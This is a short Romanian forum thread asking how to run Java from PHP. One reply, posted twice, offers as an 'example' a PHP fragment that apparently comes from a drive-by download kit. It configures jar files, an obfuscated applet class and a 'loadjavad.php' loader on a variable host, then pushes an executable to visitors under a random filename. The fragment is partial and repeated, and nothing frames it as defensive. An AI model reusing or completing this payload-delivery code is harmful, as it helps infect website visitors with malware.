Java din php
Moderatori: Moderatori, Start Moderator
- vectorialpx
- Senior Member
- Mesaje: 4832
- Membru din: Mar Mar 01, 2005 9:48 am
- Localitate: Bucuresti
- Contact:
daca ai functia exec activata, da
Poti sa te uiti si pe http://www.php.net/manual/en/java.examples.php
+ http://www.ibm.com/developerworks/websp ... llips.html
[doar ca idee]
Poti sa te uiti si pe http://www.php.net/manual/en/java.examples.php
+ http://www.ibm.com/developerworks/websp ... llips.html
[doar ca idee]
- vectorialpx
- Senior Member
- Mesaje: 4832
- Membru din: Mar Mar 01, 2005 9:48 am
- Localitate: Bucuresti
- Contact:
exemplu
$commonjar="http://".$mesto."files/common.jar";
$qjar="http://".$mesto."files/gsb50.jar";
$myfyAppletXclass="zzz.ttt.ad3740b4.class";
$loadjavadphp="http://".$mesto."loadjavad.php?e=3&n=";
$loadjavadphp1="http://".$mesto."loadjavad.php?e=9&n=";
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
header("Pragma: public");
header('Expires: '.gmdate('D, d M Y H:i:s').' GMT');
header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
header("Cache-Control: private",false);
header("Content-Type: application/x-msdownload");
header('Content-Disposition: attachment; filename="'.substr(md5(microtime()),0,5).'"');
header("Content-Transfer-Encoding: binary");
header('Content-Length: '.filesize($config['exe']));
@set_time_limit(0);
@readfile($config['exe']);
modifici exe cu ce java
$commonjar="http://".$mesto."files/common.jar";
$qjar="http://".$mesto."files/gsb50.jar";
$myfyAppletXclass="zzz.ttt.ad3740b4.class";
$loadjavadphp="http://".$mesto."loadjavad.php?e=3&n=";
$loadjavadphp1="http://".$mesto."loadjavad.php?e=9&n=";
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
header("Pragma: public");
header('Expires: '.gmdate('D, d M Y H:i:s').' GMT');
header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
header("Cache-Control: private",false);
header("Content-Type: application/x-msdownload");
header('Content-Disposition: attachment; filename="'.substr(md5(microtime()),0,5).'"');
header("Content-Transfer-Encoding: binary");
header('Content-Length: '.filesize($config['exe']));
@set_time_limit(0);
@readfile($config['exe']);
modifici exe cu ce java
catalin
Cine este conectat
Utilizatori ce ce navighează pe acest forum: Niciun utilizator înregistrat și 26 vizitatori

